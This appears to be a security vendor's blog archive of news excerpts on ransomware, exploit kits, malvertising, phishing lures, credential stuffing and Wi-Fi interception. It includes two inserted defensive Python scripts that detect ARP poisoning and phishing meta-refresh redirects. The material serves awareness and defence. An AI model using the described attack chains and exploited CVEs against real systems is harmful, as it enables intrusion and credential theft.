The vaccine rollout is likely to take many months and it could well be the autumn or later before most people receive the vaccine. Cybercriminals have already adopted COVID-19 vaccine lures to obtain sensitive information and spread...
by G Hunt |
June 26, 2020 |
Internet Security News, Web Filtering
The notorious cybercriminal organization Evil Corp, which was responsible for the Dridex and Zeus banking Trojans and BitPaymer ransomware, has started using a brand new ransomware called WastedLocker, so named due to the .wasted extension which is used on encrypted files. Evil Corp has been relatively quiet in recent months following the indictment of two high-profile members of the group by the U.S. Department of Justice in December 2019 for their role in the creation and distribution of Dridex and Zeus. The group bounced back with relatively low-level campaigns in January, but there has been little activity since. It appears that the time has been spent developing WastedLocker ransomware, which appears to have been mostly written from scratch. WastedLocker ransomware was first used in May 2020 and is believed to be a replacement for BitPaymer ransomware. In the short space of time that the new ransomware has been in use, attacks have been conducted on at least 31 organizations, according to data from Symantec. Most of the victims are located in the United States; eight of them are Fortune 500 companies and 11 are publicly listed. Attacks have been conducted on companies operating in a wide range of industry sectors, with the manufacturing, information technology, and media and telecommunications sectors experiencing the highest number of attacks. Evil Corp appears to be targeting large organizations with deep enough pockets to pay the sizeable ransom demand, which has ranged from $500,000 to $10 million in some cases. In contrast to many other ransomware operators, Evil Corp does not steal data prior to file encryption, although that could well change in the future. The group certainly has the technical skill to adopt that tactic, but it appears that they have refrained from doing so to stay under the radar. WastedLocker ransomware is downloaded using the JavaScript framework SocGholish under the guise of a browser update.
Symantec has identified more than 150 websites that have been compromised that are being used as part of the campaign to deliver the ransomware payload. Once a network has been compromised, the attackers use living-off-the-land tactics...
by G Hunt |
April 29, 2020 |
Cybersecurity News, Internet Security News
The massive increase in employees working remotely has not been missed by cybercriminals, who are actively targeting these workers using a variety of tactics to fool them into disclosing their credentials or installing malware. Phishing attacks remain the most common method used to attack remote workers, but there has also been a notable increase in malvertising during the COVID-19 pandemic. Malvertising is the practice of creating malicious adverts which are syndicated across legitimate websites through third-party ad networks. The malicious adverts are used to redirect website visitors to webpages where credentials are harvested, malware is downloaded, or to other scams to obtain fraudulent payments or charitable donations. Several COVID-19 themed ploys have been used in these malvertising campaigns to trick people into downloading malware. These scams prey on fears about SARS-CoV-2, often spoofing the WHO and other COVID-19 authorities to add legitimacy to the campaigns. A common theme is an offer of important advice on how to protect against COVID-19. The rise in malvertising activity during the COVID-19 pandemic has been significant, with some reports indicating the number of malicious adverts doubled in March compared to the standard level of malicious advert activity prior to the pandemic. A malvertising campaign was recently identified that spoofed the anti-malware software vendor Malwarebytes. The campaign claimed the user’s computer was infected with malware and a download of Malwarebytes’ software was required to remove the infections. The malicious webpage used for the scam was on a malwarebytes-free domain that was registered on March 29, 2020. The site used a copycat template created from stolen branding from the genuine site. Any individual that landed on the website using the Internet Explorer browser was redirected to a webpage hosting the Fallout exploit kit, which silently downloads the Raccoon information stealer.
There was a major increase in domain registrations related to COVID-19 in March. While not all of these websites are currently being used for nefarious purposes, many are being used for scamming. NTT recently issued an...
by G Hunt |
April 27, 2020 |
Cybersecurity News, Internet Security News
New research has recently been published which suggests there has been a lack of security awareness training for remote workers, even with the massive increase in people working from home due to the COVID-19 pandemic and the increased threat level. Many companies have had to make major changes to policies and allow most employees to work from home, even though doing so introduces cybersecurity risks. While this is seen by many as a temporary measure due to the pandemic, there is currently some debate about how long lockdown measures will be in place. It could well be many months before lockdowns are eased and there is a return to “normal” working life. It may also be difficult to convince workers to return to the office when measures are eased, or at least until a vaccine for the virus has been developed. That could well be a year or most likely much longer. In the meantime, remote workers are not just encountering the odd phishing email. These workers are being actively targeted by cybercriminals and APT groups. It is important to ensure that technical controls are up to scratch and are blocking threats but also to train workers to recognize threats such as phishing.
Technical Controls Will Not Block 100% of Cybersecurity Threats
Technical solutions can block most malware and phishing attacks on remote workers and will protect devices and the networks to which those devices connect. TitanHQ has developed two solutions that provide excellent protection from email and web-based threats, and there has been a massive increase in demand for those solutions during the COVID-19 pandemic from businesses and managed service providers (MSPs). When these solutions are coupled with other cybersecurity protections such as firewalls, antivirus software, and intrusion detection systems, businesses will be well protected; however, no matter how many layers are added to your defenses, security awareness training for remote workers should still be provided.
Employees are the last line of defense and require training to help them identify threats that bypass your technical defenses.
Employees are a Weak Link, but Neglecting Security Awareness Training for Remote Workers is a...
by G Hunt |
February 24, 2020 |
Internet Security News, Network Security
Phishing attacks are increasing and malware is a growing threat. A DNS filter adds an important level of protection to block these attacks. In this post we explain why.
The Growing Threat from Malware and Phishing Attacks
There are various methods used to deliver malware, but email remains one of the most common methods of distributing malware, either through malicious attachments or hyperlinks in emails that direct users to websites where malware is downloaded. The latter is a popular method of malware delivery as there is an increased chance that the hyperlink will not be detected as malicious by an email security solution. Various tactics are used to mask these URLs from email security solutions, such as adding the hyperlink to an attached file such as a PDF. The Emotet Trojan is one of the most prevalent threats and also one of the most dangerous. Emotet is primarily spread via email through a combination of attachments and malicious URLs. The Trojan is an information stealer capable of spreading across networks to infect other vulnerable devices. Removing the malware is problematic, as there are usually multiple devices infected. As soon as the malware is removed from one device, others on the network re-infect the cleaned machine. Emotet is also a malware downloader. Once all valuable information has been obtained post-infection, other malware variants such as the TrickBot Trojan and Ryuk ransomware are downloaded. All devices infected with Emotet are added to the botnet. An analysis by the Spamhaus Project revealed around 6,000 malicious URLs are emitted from infected devices, which act as compromise vectors. An advanced spam filter will ensure that the majority of malicious emails are blocked, but it is important not to rely on a spam filter alone to block email-based malware and phishing attacks. The key to a strong defense is to implement layered defenses.
With overlapping layers of security, if one layer fails to block a threat, another is in place to provide protection. One of the most important additional protections against phishing attacks and email-based malware is a web filter.
Why a Web Filter is so Important
Phishing attacks have an...
by G Hunt |
December 31, 2019 |
Cybersecurity Advice, Internet Security News
Today there is an increasingly mobile workforce. Workers are able to travel and stay connected to the office and many employees are allowed to work remotely for at least some part of the week. While workers are in the office, security is not a problem for IT departments. Workers connect to the internal network, be that a wired or wireless network, and thanks to the protection of the firewall, their devices and the network are protected. The problem comes when workers move outside the protection of that firewall. Here IT departments struggle to ensure the same level of protection. When workers are travelling for work or are between the home and the office, they often connect to public Wi-Fi hotspots. Connecting to those hotspots introduces risks. While connected, sensitive information could potentially be disclosed which could be intercepted. Malware could also be inadvertently downloaded. When a connection is made to the work network, that malware could easily be transferred. Connecting to untrusted Wi-Fi networks is a major risk. These could be legitimate Wi-Fi services provided on public transport, in coffee shops, or city-wide Wi-Fi networks. While these networks may be safe, there is no telling who may be connected to that network. These Wi-Fi networks are often not monitored, and cybersecurity protections may be poor. There are several possible attack scenarios where an individual could perform malicious acts on users of the Wi-Fi network. One of the biggest risks is a man-in-the-middle attack. In this scenario, a Wi-Fi user will be connected to the network and will believe that they are securely accessing the internet, their email, or even the work network, when the reality is that their connection is anything but secure. A hacker could be listening in and could obtain information from that connection. 
Through ARP poisoning, a hacker could trick the Wi-Fi gateway and the user’s device into connecting, and traffic would be routed through the hacker’s device where it is intercepted. An attacker could also create an evil twin hotspot. Here a rogue hotspot is created that closely mimics the genuine hotspot. A Wi-Fi user may mistakenly connect to the evil...
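The defender's counterpart to the ARP poisoning scenario above, as an added example for this article (not TitanHQ code): a small check over a neighbour-table snapshot that flags the two classic symptoms, the gateway's MAC address changing from the one recorded on a trusted connection, and one MAC address answering for several IP addresses. The two `ip neigh`-style snapshots are constructed, and the gateway address and its baseline MAC are assumptions.

```python
"""Spot the symptoms of ARP poisoning in a neighbour-table snapshot.

Added example for this article, not TitanHQ code. The snapshots below are
constructed in the format of `ip neigh show` on Linux; the gateway address
and its baseline MAC are assumptions standing in for values recorded when
the device first joined a trusted network.
"""
import re
from collections import defaultdict
from typing import Dict, List

GATEWAY_IP = "192.168.1.1"                  # assumed default gateway on the hotspot
BASELINE_GATEWAY_MAC = "aa:bb:cc:00:00:01"  # assumed MAC recorded on a trusted connection

# Constructed snapshot: everything as expected.
SNAPSHOT_CLEAN = """\
192.168.1.1 dev wlan0 lladdr aa:bb:cc:00:00:01 REACHABLE
192.168.1.23 dev wlan0 lladdr de:ad:be:ef:00:23 STALE
192.168.1.77 dev wlan0  FAILED
"""

# Constructed snapshot: the gateway now resolves to the MAC of another client,
# which is also still answering for its own address.
SNAPSHOT_POISONED = """\
192.168.1.1 dev wlan0 lladdr de:ad:be:ef:00:23 REACHABLE
192.168.1.23 dev wlan0 lladdr de:ad:be:ef:00:23 STALE
192.168.1.40 dev wlan0 lladdr 02:11:22:33:44:55 DELAY
"""

_NEIGH_LINE = re.compile(
    r"^(?P<ip>\S+) dev (?P<dev>\S+) lladdr (?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})\b",
    re.IGNORECASE,
)


def parse_neigh(text: str) -> Dict[str, str]:
    """Map IP -> MAC for rows that carry a link-layer address (FAILED rows have none)."""
    table: Dict[str, str] = {}
    for line in text.splitlines():
        m = _NEIGH_LINE.match(line.strip())
        if m:
            table[m["ip"]] = m["mac"].lower()
    return table


def arp_alerts(table: Dict[str, str], gateway_ip: str, baseline_mac: str) -> List[str]:
    """Flag a moved gateway MAC and any MAC that claims more than one IP."""
    alerts: List[str] = []
    gw_mac = table.get(gateway_ip)
    if gw_mac is not None and gw_mac != baseline_mac.lower():
        alerts.append(f"gateway {gateway_ip} MAC changed {baseline_mac} -> {gw_mac}")
    ips_by_mac: Dict[str, List[str]] = defaultdict(list)
    for ip, mac in table.items():
        ips_by_mac[mac].append(ip)
    for mac, ips in sorted(ips_by_mac.items()):
        if len(ips) > 1:
            alerts.append(f"MAC {mac} claims {len(ips)} IPs: {', '.join(sorted(ips))}")
    return alerts


def check_snapshot(text: str) -> List[str]:
    """Convenience wrapper using the assumed gateway and baseline above."""
    return arp_alerts(parse_neigh(text), GATEWAY_IP, BASELINE_GATEWAY_MAC)


if __name__ == "__main__":
    print("clean:", check_snapshot(SNAPSHOT_CLEAN))
    print("poisoned:", check_snapshot(SNAPSHOT_POISONED))
```

On a real laptop the baseline would be captured once per trusted network and the check rerun periodically; a moved gateway MAC on a hotspot is worth treating as a signal to drop the connection and use the VPN only, not as proof of an attack, since access-point failover can also change it.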
by G Hunt |
November 14, 2019 |
Cybersecurity Advice, Internet Security News
The increase in cyberattacks on law firms has highlighted a need for greater security protections, especially to protect against phishing, malware, and ransomware. According to a recent Law.com report, more than 100 law firms are known to have experienced cyberattacks in the past five years: cyberattacks that have resulted in hackers gaining access to sensitive information and, in many cases, employee, attorney, and client information. Investigations such as this one are likely to uncover just a small percentage of successful cyberattacks, as many are resolved quietly and are not reported. Many law firms will be keen to keep a cyberattack private due to the potential damage it could do to a firm’s reputation. The reputation of a law firm is everything. As Law.com explained, there are different data breach reporting requirements in different states. If there is no legal requirement to report the data breaches, they will not be reported. That means that only if reportable information has potentially been compromised will the breach be reported to regulators or made public. It is therefore not possible to tell how many successful cyberattacks on law firms have occurred. However, there has been a steady rise in reported cyberattacks on law firms, as is the case with attacks on other industry sectors. Law.com’s figures are likely to be just the tip of the iceberg. From the perspective of cybercriminals, law firms are a very attractive target. The types of information stored on clients are incredibly valuable and can be used for extortion. Information on mergers and takeovers and other sensitive corporate data can be used to gain a competitive advantage. Cybercriminals are also well aware that if they can deploy ransomware and encrypt client files, there is a higher than average probability that the ransom will be quietly paid. Based on the information that has been made public about law firm data breaches, one of the main ways that law firms are attacked is via email.
Many of the data breaches started with a response to a phishing or spear phishing email. Phishing allows cybercriminals to bypass even sophisticated cybersecurity protections as it targets a well-known...
by G Hunt |
October 21, 2019 |
Internet Security News, Web Filtering
The Spelevo exploit kit is being used to deliver Maze ransomware to unsuspecting internet users via a vulnerability in Adobe Flash Player. The Spelevo exploit kit has been used to deliver a variety of malicious payloads since it was first detected in early 2019. Initially it was used to silently download the GootKit Trojan, and latterly the Dridex and IcedID banking Trojans. Now the threat actors behind Maze ransomware have joined forces with the EK developers to deliver their malicious payload. Spelevo has previously been loaded onto a compromised business-to-business contact website to target business users, although the latest campaign uses ad network traffic to send users to a fake cryptocurrency website, where they are then redirected to a web page hosting the exploit kit. The Flash vulnerability – CVE-2018-15982 – is then exploited in the browser to silently download and execute the ransomware payload. If that download occurs, the user’s files will be encrypted. There is currently no free decryptor for Maze ransomware. Recovery will depend on restoring files from backups – provided they too have not been encrypted – or the user will face permanent file loss if they do not pay the ransom demand. The ransom doubles if payment is not made within a week. Exploit kits used to be one of the main ways that malware was distributed, although they fell out of favor with cybercriminals who found alternate, more profitable ways to earn money. The threat never disappeared, but exploit kit activity dropped to a tiny fraction of the level seen a few years ago when Angler exploit kit activity was at its peak. However, over the past year or so, exploit kit activity has been increasing. Today, there are several active exploit kits that are being used to deliver a variety of malware and ransomware payloads. Exploit kits will only work if they have been loaded with an exploit for a vulnerability that has not been patched on a user’s device.
Prompt patching will ensure that even if a user lands on a web page hosting an exploit kit, no malware download will take place. However, many businesses are slow to apply patches and it can be several months before...
by G Hunt |
August 27, 2019 |
Cybersecurity News, Internet Security News
A new phishing campaign has been detected which uses Microsoft Office 365 voicemail notifications as a lure to get users to open a malicious HTML file attached to the email. The phishing emails are very realistic. The emails include the Microsoft and Office 365 logos, use the Microsoft color scheme, and include Microsoft contact information. The messages inform the recipient that they have received a new voicemail message. The caller’s number and the length of the voicemail message are included, along with the time and date of the message. In order to access that message, the user is required to open an HTML file attached to the email. Many phishing campaigns use Word documents or Excel spreadsheets containing malicious macros or embedded hyperlinks that direct users to a phishing web page where credentials are harvested. Through security awareness training, employees are told to look out for these commonly used file types. HTML files are likely to be familiar to employees, but since these file types are not often used in phishing campaigns, employees may believe the attached file to be benign, when that is definitely not the case. The HTML file uses a meta refresh to redirect the user from the local HTML file to a phishing page hosted on the Internet. That phishing page contains a highly realistic spoofed voicemail management page where users are required to enter their Office 365 credentials to access the message. Doing so hands those credentials to the attacker. Cybercriminals are constantly coming up with new ways to trick employees into clicking links in emails or opening malicious attachments. Keeping the workforce up to date on these threats is important. If employees are aware of the types of scam emails they are likely to receive, they will be more likely to correctly identify an email as malicious if it arrives in their inbox. Keeping the workforce 100% up to date on the latest scams will not be possible, as new scams and lures are constantly being developed.
It is therefore important to ensure that you have an advanced spam filtering solution in place that can block these messages to ensure they never test employees. SpamTitan incorporates DMARC to block email...
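The meta-refresh trick described above is easy to check for on the mail-filtering side. The following is an added example for this article, not SpamTitan or TitanHQ code: it parses an HTML attachment with the standard library, pulls the target out of any `<meta http-equiv="refresh" content="0; url=...">` tag, and flags the attachment when that target is a remote http(s) host, since a local file that immediately bounces the browser elsewhere is exactly the pattern in this campaign. The sample attachment and the hostname in it are constructed placeholders, not data from the campaign.

```python
"""Flag HTML email attachments that immediately meta-refresh to a remote page.

Added example for this article, not SpamTitan or TitanHQ code. The sample
attachments are constructed; the hostname in them is a placeholder.
"""
import re
from html.parser import HTMLParser
from typing import List, Optional, Tuple
from urllib.parse import urlsplit

# Constructed sample in the style the article describes: a "voicemail" page
# that sends the browser straight to a remote login page.
SAMPLE_ATTACHMENT = """<html><head><title>Voicemail</title>
<meta http-equiv="Refresh" content="0; URL='https://voicemail-portal.example/login'">
</head><body>Loading your voicemail message...</body></html>"""

# Constructed benign sample: a refresh with no target only reloads the local file.
BENIGN_ATTACHMENT = """<html><head><meta http-equiv="refresh" content="30"></head>
<body><p>Meeting notes</p></body></html>"""

# The content attribute looks like "N; url=TARGET"; the url= part is optional and
# case-insensitive, and the target may be quoted or bare.
_URL_IN_CONTENT = re.compile(r"url\s*=\s*['\"]?([^'\"\s;]+)", re.IGNORECASE)


class MetaRefreshFinder(HTMLParser):
    """Collect redirect targets from <meta http-equiv="refresh"> tags."""

    def __init__(self) -> None:
        super().__init__()
        self.targets: List[str] = []

    def handle_starttag(self, tag: str, attrs) -> None:
        if tag != "meta":  # HTMLParser lower-cases tag and attribute names for us
            return
        a = {k: (v or "") for k, v in attrs}
        if a.get("http-equiv", "").strip().lower() != "refresh":
            return
        m = _URL_IN_CONTENT.search(a.get("content", ""))
        if m:
            self.targets.append(m.group(1))


def meta_refresh_targets(html: str) -> List[str]:
    """Return every meta-refresh target found in the document, in order."""
    p = MetaRefreshFinder()
    p.feed(html)
    p.close()
    return p.targets


def redirect_verdict(html: str) -> Tuple[bool, Optional[str]]:
    """(True, target) if the attachment bounces to a remote http(s) host, else (False, None)."""
    for target in meta_refresh_targets(html):
        parts = urlsplit(target)
        if parts.scheme in ("http", "https") and parts.netloc:
            return True, target
    return False, None


if __name__ == "__main__":
    print(redirect_verdict(SAMPLE_ATTACHMENT))   # (True, 'https://voicemail-portal.example/login')
    print(redirect_verdict(BENIGN_ATTACHMENT))   # (False, None)
```

A real filter would run the same check on the decoded attachment body before delivery and also look for script-based redirects (assignments to `window.location`), which this parser does not cover; the point here is that the redirect is visible in the attachment itself, so it can be caught without ever rendering the page.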
by G Hunt |
July 12, 2019 |
Cybersecurity Advice, Internet Security News
A Google Calendar phishing campaign is being conducted that abuses trust in the app to get users to click malicious hyperlinks. Cybercriminals are constantly developing new phishing tactics to convince end users to click links in emails or open email attachments. These campaigns are often conducted on organizations using Office 365. Campaigns are tested on dummy Office 365 accounts to make sure messages bypass Office 365 spam defenses. Messages are carefully crafted to maximize the probability of an individual clicking the link, and the sender name is spoofed to make the message appear to have been sent from a known and trusted individual. Businesses that implement email security solutions that incorporate DMARC authentication can block the vast majority of these email spoofing attacks. Office 365 users that use a third-party anti-phishing solution for their Office 365 accounts can make sure malicious messages are blocked. Along with end user training, it is possible to mount a solid defense against phishing and email impersonation attacks. A new phishing tactic is being used in an active campaign targeting businesses which achieves the same aim as an email-based campaign but uses a personal calendar app to do so. Phishing campaigns have one of two main aims – to steal credentials for use in a further attack or to convince the user to install some form of malware or malicious code. This is most commonly achieved using an embedded hyperlink in the email that the user is urged to click. In the Google Calendar phishing attacks, events are added into app users’ calendars along with hyperlinks to the phishing websites. This is possible because the app adds invites to the calendar agenda, even if the invite has not been accepted by the user. All the attacker needs to do is send the invite. As the day of the fictitious event approaches, the user may click the link to find out more.
To increase the likelihood of the link being clicked, the attacker sets event reminders so the link is presented to the user on multiple occasions. This attack method is only possible with Google Calendar in its default setting. Unfortunately, many users will not have updated their settings...
by G Hunt |
June 24, 2019 |
Cybersecurity News, Internet Security News
While it is good news that the GandCrab ransomware operation has been shut down, ransomware attacks are on the rise and a new threat has been detected: Buran ransomware. Buran ransomware lacks some of the common features of more successful ransomware strains. The ransomware does not make any attempt to hide its activity and it doesn’t attempt to hamper recovery by deleting Windows shadow copies. However, it is capable of encrypting a wide range of file types and there is currently no free decryptor available to unlock encrypted files.
Buran ransomware is being spread via the RIG exploit kit, with traffic to that exploit kit generated using a malvertising campaign. Malicious adverts have been injected into legitimate ad networks and are being displayed on a range of different websites. The malvertising campaign was identified by security researcher nao_sec. The malvertising campaign directs web browsers to a domain hosting RIG, which attempts to exploit several vulnerabilities in Internet Explorer. If an unpatched vulnerability exists, Buran ransomware will be downloaded and executed. An analysis of the malware suggests it is a new variant of Vega ransomware that was previously used in a campaign in Russia.
While Buran ransomware may not be a long-term successor to GandCrab ransomware, there are many threat actors moving to fill the void. Sodinokibi ransomware attacks are increasing and the ransomware developers are also using a malvertising campaign on the PopCash ad network to deliver traffic to domains hosting the RIG exploit kit. Exploit kits can only download malware if they have been loaded with an exploit for a vulnerability that has not been patched on a visitor’s computer. The primary defense against these attacks is to ensure that all Windows security updates are applied promptly, along with updates and patches for plugins and other browsers. There is invariably a delay between a patch being issued and all devices being updated.
To provide protection until patches are applied, and to protect against zero-day exploits, a web filtering solution is recommended. A web filter can be used to control the websites that can be visited by employees and can block...
by G Hunt |
May 29, 2019 |
Cybersecurity News, Internet Security News
TitanHQ is a leading provider of email security, web security, and email archiving solutions to SMBs and managed service providers (MSPs) serving the SMB market. Over the past five years, TitanHQ has significantly expanded its customer base and its solutions now protect over 7,500 businesses and are offered by more than 1,500 MSPs around the world. TitanHQ works closely with European partners and businesses and has been expanding its footprint throughout the EU. TitanHQ is working towards becoming the leading email and web security solution provider in Europe and as part of that process, the company has recently entered into a new partnership with the French Value Added Distributor Exer. Exer is one of the leading VADs in France and works with more than 600 value added resellers and integrators in the country. The company specializes in network security, mobile security, Wi-Fi and managed cybersecurity services and helps French VARs better serve their clients. Under the new partnership agreement, Exer will start offering TitanHQ’s three cloud-based solutions to French VARs: SpamTitan, WebTitan, and ArcTitan. SpamTitan is an award-winning spam filtering solution that keeps inboxes free from spam emails and malicious messages. The solution is regularly updated to incorporate further controls to ensure that it continues to provide superior protection against an ever-changing email threat landscape. The solution now blocks more than 7 billion spam and malicious messages every month and helps to keep businesses protected from phishing and malware attacks. WebTitan is a cloud-based DNS filtering solution that protects businesses from a wide range of malicious web content. The solution can also be used to carefully control the types of web content that users can access through company wired and wireless networks. 
The solution now blocks more than 60 million malicious websites every month and prevents malware downloads, controls bandwidth use, and enforces acceptable internet usage policies. ArcTitan is a cloud-based email archiving solution that helps businesses securely store emails to ensure compliance with government and EU regulations. The solution now archives...
by G Hunt |
May 7, 2019 |
Internet Security News, Network Security
A new version of WebTitan Cloud has been released by TitanHQ. WebTitan Cloud 4.12 offers existing and new customers the opportunity to set filtering controls by location, in addition to setting organization-wide policies and role and departmental policies via links to Active Directory/LDAP. The new feature will be especially useful to MSPs and companies with remote workers, satellite offices, bases in multiple locations, and operations in overseas countries. Organization-wide web filtering policies can be set to prevent users from accessing illegal web content and pornography, but oftentimes, the one size fits all approach does not work for web filtering. The new location filter helps solve this. MSPs can use this new feature to set web filtering controls for customers in different locations while businesses using WebTitan Cloud can easily set a range of different policies for all users from a specific location, whether those users are accessing the Internet on or off the network. There will naturally be times when policies need to be bypassed to enable specific tasks to be completed. Rather than making temporary changes to location or other policies, WebTitan Cloud uses cloud keys which allow policy-based controls to be temporarily bypassed. Accompanying the location-based controls are new reporting options which allow administrators to quickly access information about web views and blocked access attempts in real time. While reports can be useful, oftentimes information needs to be accessed quickly. To help administrators find the information they need, search functionality has been enhanced. Administrators can use the search filter on the history page to search by location name. For MSPs this allows a specific customer to be selected and for traffic information at a specific location to be quickly viewed in real time, without having to generate a report. 
Location-based web filtering policies can be set and viewed for all locations through the same user interface, giving administrators full visibility into the traffic and settings of all customers through a single pane of glass. It is hoped that these updates will make WebTitan even more useful for businesses and...
by G Hunt |
January 21, 2019 |
Cybersecurity News, Internet Security News
The Fallout exploit kit, a toolkit used to silently deliver ransomware and malware to vulnerable devices, was first identified in September 2018. Between September and December, the toolkit was used to exploit vulnerabilities and deliver GandCrab ransomware and other malicious payloads. Towards the end of the year, the vulnerabilities most commonly exploited were a remote code execution vulnerability in the Windows VBScript engine (CVE-2018-8174) and the use-after-free vulnerability in Adobe Flash Player (CVE-2018-4878).
Around December 27, 2018, Fallout exploit kit activity stopped, but only for a few days. Now the exploit kit is back, and several updates have been made including the addition of HTTPS support, a new landing page format, and PowerShell-based malware downloads. A new exploit has also been added for a use-after-free Adobe Flash Player vulnerability (CVE-2018-15982) that was exploited as a zero-day before being patched on December 5, 2018; the same vulnerability is also exploited by the Underminer exploit kit.
The Fallout exploit kit is primarily delivered via malvertising campaigns – malicious adverts on third-party ad networks that are served on a variety of legitimate websites. The adverts redirect users to the exploit kit, which probes for vulnerabilities and exploits them to silently deliver malware or ransomware. The updated version of the Fallout exploit kit is delivering the latest version of GandCrab ransomware, for which there is no free decryptor. In addition to GandCrab ransomware, the Fallout exploit kit is delivering ServHelper, AZORult, TinyNuke, Dridex and Smokebot malware. The malvertising campaigns used to generate traffic to the exploit kit include TrafficShop, Popcash, RevenueHits, and HookAds. The latter is primarily used on high-traffic adult websites that are visited millions of times a month. Users are redirected to a decoy adult site that contains the exploit kit and would be unaware that anything untoward has happened.
If there is an unpatched vulnerability for which Fallout has an exploit, the ransomware or malware payload will be silently downloaded. Exploit kit activity is now much lower than in 2016 when EKs were extensively used to deliver malware, but...
by G Hunt |
December 12, 2018 |
Cybersecurity Advice, Internet Security News
It is straightforward to implement security controls to protect wired networks, but many businesses fail to apply the same controls to improve WiFi security, often due to a lack of understanding about how to improve wireless access point security. In this post we cover some of the main threats associated with WiFi networks and explain how easy it can be to improve wireless access point security.
Wireless Access Points are a Security Risk
Most businesses now apply web filters to control the types of content that can be accessed by employees on their wired networks, but securing wireless networks can be more of a challenge. It is harder to control and monitor access and block content on WiFi networks. Anyone within range of the access point can launch an attack, especially on public WiFi hotspots which have one set of credentials for all guest users. It is therefore essential that controls are implemented to improve wireless access point security and protect users of the WiFi network.
WiFi Security Threats
A single set of credentials means cybercriminals are afforded a high degree of anonymity. That allows them to use WiFi networks to identify local network vulnerabilities virtually undetected. They could conduct brute force attacks on routers, for example, or use WiFi access to inject malware on servers that lack appropriate security. If access is gained to the router, attacks can be launched on connected devices, and malware can be installed on multiple endpoints or even POS systems to steal customers’ credit/debit card information. The cyberattack on Dyn is a good example of how malware can be installed and used for malicious purposes. The DNS service provider was attacked, which resulted in large sections of the Internet being made inaccessible. A botnet of more than 100,000 compromised routers and IoT devices was used in the attack.
Man-in-the-Middle attacks are also common on WiFi networks. Any unencrypted content can be intercepted, for example when information is exchanged between a user and an HTTP site rather than an HTTPS site and no VPN is used. Public WiFi networks are often used for all manner of nefarious purposes due to the anonymity provided. If users take...
by G Hunt |
December 6, 2018 |
Cybersecurity Advice, Internet Security News
A credential stuffing attack has led to a Dunkin Donuts data breach which has seen some customer data compromised. While the breach was limited and most attempts to access customers’ DD Perks accounts were blocked, the incident does highlight the risks of password reuse. It is unclear exactly how many customers have been affected, but for certain customers, the attackers may have gained access to their DD Perks accounts – the loyalty program run by the donut company. The Dunkin Donuts data breach was limited to first and last names, email addresses, DD Perks account numbers, and QR codes.
The method used to gain access to customers’ DD Perks accounts was unsophisticated, cheap to conduct, and for the most part can be conducted automatically. Low cost and little effort makes for a winning combination for hackers. The Dunkin Donuts data breach did not involve internal systems and no credentials were stolen from the donut giant. Customers’ usernames (email addresses) and passwords were obtained from security breaches at other companies. Those usernames and passwords were then utilized in an automated attack on Dunkin Donuts customers’ DD Perks accounts.
Dunkin Donuts has performed a password reset and affected users will be required to choose a new password. New DD Perks account numbers will be given to affected customers and their card balances will be transferred to the new account. Since Dunkin Donuts did not expose any passwords and its systems remained secure, the only individuals that will have been affected are those that have used the same password for their DD Perks account that they have used on other online platforms.
The Risks of Password Reuse
Hackers obtain credentials from multiple data breaches, compile the data to create a list of passwords that have previously been used with a specific email address, then conduct what is known as a credential stuffing attack.
Multiple login attempts are made using the different passwords associated with an email address. The Dunkin Donuts data breach demonstrates the importance of good password hygiene and the risks of password reuse. Every user account must be secured with a strong, unique password – One that has...
by G Hunt |
November 29, 2018 |
Cybersecurity News, Internet Security News
A Starbucks porn filter will finally be introduced in 2019 to prevent adult content from being accessed by customers hooked up to the coffee shop chain’s free WiFi network. It has taken some time for the Starbucks porn filter to be applied. In 2016, the coffee shop chain agreed to implement a WiFi filtering solution following a campaign from the internet safety advocacy group Enough is Enough, but two years on, a Starbucks porn filter has only been applied in the UK.
Businesses Pressured to Implement WiFi Filters to Block Porn
Enough is Enough launched its Porn Free WiFi campaign – now renamed the SAFE WiFi campaign – to pressure businesses that offer free WiFi to customers to apply WiFi filters to restrict access to adult content. In 2016, more than 50,000 petitions were sent to the CEOs of Starbucks and McDonald’s urging them to apply WiFi filters and take the lead in restricting access to pornography and child porn on their WiFi networks. After being petitioned, McDonald’s, the global restaurant chain, took prompt action and rolled out a WiFi filter across its 14,000 restaurants. However, Starbucks has been slow to take action. Following the McDonald’s announcement in 2016, Starbucks agreed to roll out a WiFi filter once it had determined how to restrict access to unacceptable content without involuntarily blocking unintended content. Until the Starbucks porn filter was applied, the coffee shop chain said it would reserve the right to stop any behavior that negatively affected the customer experience, including activities on its free WiFi network.
The apparent lack of action prompted Enough is Enough to turn up the heat on Starbucks. On November 26, 2018, Enough is Enough president and CEO, Donna Rice Hughes, issued a fresh call for a Starbucks porn filter to be implemented and for the coffee chain to follow through on its 2016 promise. Rice Hughes also called for the public to sign a new petition calling for the Starbucks porn filter to finally be put in place.
Starbucks Porn Filter to Be Applied in All Locations in 2019
Starbucks has responded to Enough is Enough, via Business Insider, confirming that it has been testing a variety of WiFi filtering solutions...
by G Hunt |
November 8, 2018 |
Cybersecurity Advice, Internet Security News
Most businesses are aware of the importance of securing their Wi-Fi networks; however, in some industry sectors Wi-Fi security has not been given the importance it requires. Wi-Fi security for hotels, for instance, is often lacking, even though the hospitality sector is being actively targeted by cybercriminals who see hotel Wi-Fi as a rich picking ground.
Hotel Chains are Under Attack
Hotels are an attractive target for cybercriminals. They satisfy the two most important criteria for cybercriminals when selecting targets: valuable data that can be quickly turned into profit, and relatively poor cybersecurity which makes conducting attacks more straightforward. In 2018, there have been several major cyberattacks on hotel groups. In November 2018, Federal Group, which runs luxury hotels in Tasmania, experienced an email security incident that exposed the personal data of some of its members. A cyberattack on the Radisson Hotel Group was also reported. In that case it resulted in the exposure of the personal information of its loyalty program members. In August one of China’s largest chains of hotels – Huazhu Hotels Group Ltd – which operates 13 hotel brands – suffered a cyberattack that affected an estimated 130 million people. In June one of Japan’s largest hotel groups, Prince Hotels & Resorts, experienced a cyberattack that impacted almost 125,000 customers. In 2017 there were major data breaches at Hilton, Hyatt Hotels Corporation, Trump Hotels, Four Seasons Hotels, Loews Hotels, Sabre Hospitality Solutions, and InterContinental Hotels Group, to name but a few.
The Cost of a Hotel Data Breach
When a data breach occurs the costs quickly mount. Access to data and networks must be blocked rapidly, the breach must be investigated, the cause must be found, and security must be improved to address the vulnerabilities that were exploited. That invariably requires consultants, forensic investigators and other third-party contractors.
Affected individuals must be notified and credit monitoring and identity theft protection services may need to be offered. The direct costs of a hotel data breach are considerable. The Ponemon Institute calculated the...
by G Hunt |
October 26, 2018 |
Cybersecurity News, Internet Security News
